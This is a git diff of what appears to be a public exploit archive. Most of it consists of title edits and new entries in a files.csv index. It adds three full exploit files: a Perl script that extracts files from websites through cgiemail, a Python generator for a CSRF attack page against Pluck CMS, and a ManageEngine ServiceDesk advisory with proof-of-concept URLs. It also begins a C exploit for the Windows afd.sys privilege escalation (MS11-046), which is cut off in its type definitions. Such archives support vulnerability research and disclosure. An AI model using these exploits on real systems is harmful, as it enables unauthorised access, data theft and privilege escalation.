diff --git a/files.csv b/files.csv index 68f4e6756..642d2542c 100755 --- a/files.csv +++ b/files.csv @@ -1985,7 +1985,7 @@ id,file,description,date,author,platform,type,port 2285,platforms/php/webapps/2285.txt,"MyBace Light - 'login_check.php' Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow",2006-09-01,bratax,windows,local,0 2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 -2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - (jhot.php) Remote Command Execution",2006-09-02,rgod,php,webapps,0 +2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 @@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 -2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - (sort_mode) Information Disclosure",2006-11-01,securfrog,php,webapps,0 +2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - (classes/index.php) Local File Inclusion",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 @@ -4177,7 +4177,7 @@ id,file,description,date,author,platform,type,port 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 -4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution",2007-10-12,str0ke,php,webapps,0 +4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 @@ -4590,7 +4590,7 @@ id,file,description,date,author,platform,type,port 4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 -4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - tiki-listmovies.php Directory Traversal",2008-01-20,Sha0,php,webapps,0 +4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 @@ -21190,25 +21190,25 @@ id,file,description,date,author,platform,type,port 23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 -23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - tiki-switch_theme.php theme Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 - img/wiki_up Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 -23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 - tiki-map.phtml Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0 +23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 +23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0 23950,platforms/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Arbitrary Remote Code Injection",2004-04-12,JeiAr,php,webapps,0 23951,platforms/php/webapps/23951.txt,"TikiWiki Project 1.8 - Add Site Multiple Options Arbitrary Remote Code Injection",2004-04-12,JeiAr,php,webapps,0 -23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 - categorize.php Direct Request Full Path Disclosure",2004-04-12,JeiAr,php,webapps,0 -23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 - messu-mailbox.php Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 - messu-read.php Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php parentId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - tiki-index.php comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure",2004-04-12,JeiAr,php,webapps,0 +23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php' articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php' parentId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php' comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - 'tiki-print_article.php' articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 -23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - tiki-upload_file.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - tiki-view_faq.php faqId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - tiki-view_chart.php chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - tiki-usermenu.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - 'tiki-upload_file.php' galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - 'tiki-view_faq.php' faqId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php' chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,"cr4wl3r ",php,webapps,0 @@ -34969,7 +34969,7 @@ id,file,description,date,author,platform,type,port 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 -38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows (x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 +38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 @@ -36619,6 +36619,7 @@ id,file,description,date,author,platform,type,port 40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80 40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,php,webapps,80 40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0 +40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0 40500,platforms/cgi/webapps/40500.py,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80 40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0 40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0 @@ -36671,3 +36672,10 @@ id,file,description,date,author,platform,type,port 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0 40562,platforms/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0 +40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0 +40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0 +40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0 +40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80 +40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0 +40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0 +40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0 diff --git a/platforms/cgi/webapps/40571.pl b/platforms/cgi/webapps/40571.pl new file mode 100755 index 000000000..6141384b6 --- /dev/null +++ b/platforms/cgi/webapps/40571.pl @@ -0,0 +1,138 @@ +#!/usr/bin/env perl +# Exploit Title: cgiemail local file inclusion +# Vendor Homepage: http://web.mit.edu/wwwdev/cgiemail/webmaster.html +# Software Link: http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz +# Version: 1.6 and older +# Date: 2016-09-27 + +# cgiecho a script included with cgiemail will return any file under a +# websites document root if the file contains square brackets and the text +# within the brackets is guessable. + +# cgiemail is currently shipped with cPanel and is enabled by default. + +# Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass'] +# will display http://hostname/login.php if login.php contains $_POST['pass'] + + + + +## +# cgiemail local file inclusion exploit +# Author: Finbar Crago +# https://github.com/finbar-crago/cgiemail-exploit +## +use strict; +use warnings; +use POSIX; +use LWP::UserAgent; +use HTML::Entities; +use Getopt::Long; +$|++; $\="\n"; $,=" "; + +sub usage { +die <<"EOF"; + +cgiemail local file inclusion exploit + +Usage: $0 [options] target + +Options: + --names Check for names in commer separated list + --num Check for numbers + --num-max Maximum number to check (default 10) + --batch Number of arguments sent per request (default 10) + --cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/') + --user-agent Set user-agent (default 'Mozilla/5.0') + --deley Pause between requests in seconds (default 1) + --timeout Set connection timeout (default 10) + +Example: + $0 --num --names 'email,password' http://hostname/login.php > login.php + +EOF +} + +my $names; +my $num = 0; +my $num_max = 10; +my $batch = 10; +my $cgiecho_path = '/cgi-sys/cgiecho'; +my $user_agent = 'Mozilla/5.0'; +my $timeout = 10; +my $deley = 1; +GetOptions( + 'names=s' => \$names, + 'num' => \$num, + 'num-max=i' => \$num_max, + 'batch=i' => \$batch, + + 'cgiecho-path' => \$cgiecho_path, + 'user-agent=s' => \$user_agent, + 'deley=i' => \$deley, + 'timeout=i' => \$timeout, +); + +usage unless + defined $ARGV[0] && + $ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i; + +my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php'; +my $url = "$conn$host/$cgiecho_path/$path"; +my @list= (); + +if($num){ push @list, $_ for 0..$num_max } +if($names){ + push @list, "%22$_%22","%27$_%27" for split/,/,$names; +} + + +my $ua = LWP::UserAgent->new; +$ua->agent($user_agent); +$ua->timeout($timeout); + +$batch--; +my $i=0; +my $end = ceil($#list/$batch); +while($#list+1){ + my $args='?'; + my $to = ($#list > $batch)?$batch:$#list; + $args.="$_=[$_]&" for @list[0..$to]; + @list = @list[$to+1..$#list]; + + my $res = $ua->get($url.$args); + die $res->status_line if !$res->content_is_html; + my $html = $res->decoded_content; + if($html !~ />cgiemail[\n\r ]*([\d.]+)/){ + print "cgiemail not found" if !$i; + print "cgiemail was here but now it's not..." if $i; + exit -1; + } print STDERR "detected cgiemail $1" if !$i; + + print STDERR "\e[Jrequest ".++$i." of $end..."; + + if($res->code == 200){ + $html =~ m|
(.+)
|s; + print decode_entities($1); + print STDERR "success!"; + exit; + } + + if($res->code == 500){ + if($html =~ m|500 Could not open template - No such file or directory|){ + print STDERR "the file /$path doesn't exist..."; + } + elsif($html =~ m|500 Empty template file|){ + print STDERR "/$path is a directory..."; + } + else{ + print STDERR "unknown 500 error:"; + print STDERR $html; + } + exit -1; + } + + select(undef,undef,undef,$deley); printf "\eM"; +} +print STDERR "sorry, no match found for $path"; +exit -1; diff --git a/platforms/java/webapps/40569.txt b/platforms/java/webapps/40569.txt new file mode 100755 index 000000000..6a7b1c305 --- /dev/null +++ b/platforms/java/webapps/40569.txt @@ -0,0 +1,80 @@ +Title: ManageEngine ServiceDesk Plus Low Privileged User View All Tickets +Date: 18 October 2016 +Author: p0z +Vendor: ManageEngine +Vendor Homepage: https://www.manageengine.com/ +Product: ServiceDesk Plus +Version: 9.2 Build 9207 (Other versions could also be affected) +Fixed Version: 9.2 Build 9228 (Released on: 29 September 2016) +URL readme fixed version: https://www.manageengine.com/products/service-desk/readme-9.2.html +Vendor ID report: SD-63280, SD-63281, SD-63282, SD-63283 + + +Product Introduction +========================== + +ServiceDesk Plus is ITIL-ready help desk software with integrated Assetand Project Management capabilities. +With advanced ITSM functionality and easy-to-use capability, ServiceDesk Plus helps IT support teams deliver +world-class service to end users with reduced costs and complexity. It comes in three editions and is available +in 29 different languages. Over 100,000 organizations, across 185 countries, trust ServiceDesk Plus to optimize +IT service desk performance and achieve high end user satisfaction. + +Source: https://www.manageengine.com/products/service-desk/ + + +Vulnerability Information +========================== + +Class: Improper Privilege Management +Impact: Low privileged user can access sensetive data +Remotely Exploitable: Yes +Authentication Required: Yes +User interaction required: Yes +CVE Name: N/A + + +Vulnerability Description +========================== + +A user with low privileged can be able view all requests/tickets (include attachments). + + +Vulnerability Details +========================== + +SD-63280: +Low privileged user can change value for "notifyTo" variable to "REQFORWARD" and get advanced features. +After, user can change ticket id (variable "id") and see all request include attachments, and +send (forward) to email. + +SD-63281: +Using low privileged user can send "Submit for Approval" e-mail even if the user don't have a necessary permission +to view the request. + +SD-63282: +Using low privileged user can able to view the other user's assets by using the below URL. +(Able to view the associated assets of administrator user using guest login) + +SD-63283: +Low privileged user can change value for "viewType" variable to "All" and see preview all requests. + + +Proof-of-Concept +========================== +SD-63280: +http://localhost:9090/SDNotify.do?notifyModule=Request&mode=E-Mail&id=1¬ifyTo=REQFORWARD + +SD-63281: +http://localhost:9090/SubmitForApproval.do?ITEMID=1&MODULE=Request + +SD-63282: +http://localhost:9090/UserAssets.do?userId=3 + +SD-63283: +http://localhost:9090/ListRequests.do?reqId=1&viewType=All + +Timeline +========================== +09-04-2016: Notification Vendor. +02-06-2016: Vendor set ID's vulnerability. +29-09-2016: Vulnerability fixed. \ No newline at end of file diff --git a/platforms/php/webapps/40566.py b/platforms/php/webapps/40566.py new file mode 100755 index 000000000..28d4db31b --- /dev/null +++ b/platforms/php/webapps/40566.py @@ -0,0 +1,74 @@ +# Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery +# Exploit Author: Ahsan Tahir +# Date: 18-10-2016 +# Software Link: http://www.pluck-cms.org/?file=download +# Vendor: http://www.pluck-cms.org/ +# Google Dork: "2005-2016. pluck is available" +# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial +# Website: www.ahsan-tahir.com +# Category: webapps +# Version: 4.7.3 +# Tested on: [Kali Linux 2.0 | Windows 8.1] +# Email: mrahsan1337@gmail.com + +import os +import urllib + +if os.name == 'nt': + os.system('cls') +else: + os.system('clear') + +def csrfexploit(): + + banner = ''' + +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+ + | ____ _ _ ____ __ __ ____ | + | | _ \| |_ _ ___| | __ / ___| \/ / ___| | + | | |_) | | | | |/ __| |/ / | | | |\/| \___ \ | + | | __/| | |_| | (__| < | |___| | | |___) | | + | |_| |_|\__,_|\___|_|\_\ \____|_| |_|____/ | + | //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter | + | > Exploit Author & Script Coder: Ahsan Tahir | + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ + ''' + print banner + + url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): ")) + title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: ")) + content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ") + + csrfhtmlcode = ''' + + + +
+ + + + + + + + + + +
+ + + ''' %(url, title, content) + + print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." + + print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") + extension = ".html" + name = raw_input(" Filename: ") + filename = name+extension + file = open(filename, "w") + + file.write(csrfhtmlcode) + file.close() + print(" [+] Your exploit is saved as %s")%filename + print("") + +csrfexploit() \ No newline at end of file diff --git a/platforms/windows/local/40564.c b/platforms/windows/local/40564.c new file mode 100755 index 000000000..fd6cd2d3f --- /dev/null +++ b/platforms/windows/local/40564.c @@ -0,0 +1,810 @@ +/* +################################################################ +# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) +# Date: 2016-10-16 +# Exploit Author: Tomislav Paskalev +# Vulnerable Software: +# Windows XP SP3 x86 +# Windows XP Pro SP2 x64 +# Windows Server 2003 SP2 x86 +# Windows Server 2003 SP2 x64 +# Windows Server 2003 SP2 Itanium-based Systems +# Windows Vista SP1 x86 +# Windows Vista SP2 x86 +# Windows Vista SP1 x64 +# Windows Vista SP2 x64 +# Windows Server 2008 x86 +# Windows Server 2008 SP2 x86 +# Windows Server 2008 x64 +# Windows Server 2008 SP2 x64 +# Windows Server 2008 Itanium-based Systems +# Windows Server 2008 SP2 Itanium-based Systems +# Windows 7 x86 +# Windows 7 SP1 x86 +# Windows 7 x64 +# Windows 7 SP1 x64 +# Windows Server 2008 R2 x64 +# Windows Server 2008 R2 SP1 x64 +# Windows Server 2008 R2 Itanium-based Systems +# Windows Server 2008 R2 SP1 Itanium-based Systems +# Supported Vulnerable Software: +# Windows XP SP3 x86 +# Windows Server 2003 SP2 x86 +# Windows Vista SP1 x86 +# Windows Vista SP2 x86 +# Windows Server 2008 x86 +# Windows Server 2008 SP2 x86 +# Windows 7 x86 +# Windows 7 SP1 x86 +# Tested Software: +# Windows XP Pro SP3 x86 EN [5.1.2600] +# Windows Server 2003 Ent SP2 EN [5.2.3790] +# Windows Vista Ult SP1 x86 EN [6.0.6001] +# Windows Vista Ult SP2 x86 EN [6.0.6002] +# Windows Server 2008 Dat SP1 x86 EN [6.0.6001] +# Windows Server 2008 Ent SP2 x86 EN [6.0.6002] +# Windows 7 HB x86 EN [6.1.7600] +# Windows 7 Ent SP1 x86 EN [6.1.7601] +# CVE ID: 2011-1249 +################################################################ +# Vulnerability description: +# The Ancillary Function Driver (AFD) supports Windows sockets +# applications and is contained in the afd.sys file. The afd.sys +# driver runs in kernel mode and manages the Winsock TCP/IP +# communications protocol. +# An elevation of privilege vulnerability exists where the AFD +# improperly validates input passed from user mode to the kernel. +# An attacker must have valid logon credentials and be able to +# log on locally to exploit the vulnerability. +# An attacker who successfully exploited this vulnerability could +# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM +# privileges). +################################################################ +# Exploit notes: +# Privileged shell execution: +# - the SYSTEM shell will spawn within the invoking shell/process +# Exploit compiling (Kali GNU/Linux Rolling 64-bit): +# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 +# Exploit prerequisites: +# - low privilege access to the target OS +# - target OS not patched (KB2503665, or any other related +# patch, if applicable, not installed - check "Related security +# vulnerabilities/patches") +# Exploit test notes: +# - let the target OS boot properly (if applicable) +# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset +################################################################ +# Patches: +# Windows XP SP3 x86 +# WindowsXP-KB2503665-x86-enu.exe +# (not available - EoL) +# Windows Server 2003 SP2 x86 +# WindowsServer2003-KB2503665-x86-enu.exe +# https://www.microsoft.com/en-us/download/details.aspx?id=26483 +# Windows Vista SP1, SP2 x86; Windows Server 2008 (SP1), SP2 x86 +# Windows6.0-KB2503665-x86.msu +# https://www.microsoft.com/en-us/download/details.aspx?id=26275 +# Windows 7 (SP0), SP1 x86 +# Windows6.1-KB2503665-x86.msu +# https://www.microsoft.com/en-us/download/details.aspx?id=26311 +################################################################ +# Related security vulnerabilities/patches: +# MS11-046 KB2503665 https://technet.microsoft.com/en-us/library/security/ms11-046.aspx +# MS11-080 KB2592799 https://technet.microsoft.com/en-us/library/security/ms11-080.aspx +# MS12-009 KB2645640 https://technet.microsoft.com/en-us/library/security/ms12-009.aspx +# MS13-093 KB2875783 https://technet.microsoft.com/en-us/library/security/ms13-093.aspx +# MS14-040 KB2975684 https://technet.microsoft.com/en-us/library/security/ms14-040.aspx +# +# Table of patch replacements: +# | MS11-046 | MS11-080 | MS12-009 | MS13-093 | MS14-040 | +# ------------------------------------------------------------- +# | KB2503665 | KB2592799 | KB2645640 | KB2875783 | KB2975684 | +# ----------------------------------------------------------------------------------------- +# Windows x86 XP SP3 | Installed | <-Replaces| - | - | - | +# Windows x86 Server 2003 SP2 | Installed | <-Replaces| <-Replaces| - | <-Replaces| +# Windows x86 Vista SP1 | Installed | - | - | - | - | +# Windows x86 Vista SP2 | Installed | - | - | - | <-Replaces| +# Windows x86 Server 2008 | Installed | - | - | - | - | +# Windows x86 Server 2008 SP2 | Installed | - | - | - | <-Replaces| +# Windows x86 7 | Installed | - | - | - | - | +# Windows x86 7 SP1 | Installed | - | - | - | <-Replaces| +################################################################ +# Thanks to: +# azy (XP, 2k3 exploit) +# Rahul Sasi (PoC) +################################################################ +# References: +# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1249 +# https://technet.microsoft.com/en-us/library/security/ms11-046.aspx +# http://web.qhwins.com/Security/2012021712023641874126.html +# https://www.exploit-db.com/exploits/18755/ +################################################################ +*/ + + +#include +#include +#include +#include + +#pragma comment (lib, "ws2_32.lib") + + +//////////////////////////////////////////////////////////////// +// DEFINE DATA TYPES +//////////////////////////////////////////////////////////////// + +typedef enum _KPROFILE_SOURCE { + ProfileTime, + ProfileAlignmentFixup, + ProfileTotalIssues, + ProfilePipelineDry, + ProfileLoadInstructions, + ProfilePipelineFrozen, + ProfileBranchInstructions, + ProfileTotalNonissues, + ProfileDcacheMisses, + ProfileIcacheMisses, + ProfileCacheMisses, + ProfileBranchMispredictions, + ProfileStoreInstructions, + ProfileFpInstructions, + ProfileIntegerInstructions, + Profile2Issue, + Profile3Issue, + Profile4Issue, + ProfileSpecialInstructions, + ProfileTotalCycles, + ProfileIcacheIssues, + ProfileDcacheAccesses, + ProfileMemoryBarrierCycles, + ProfileLoadLinkedIssues, + 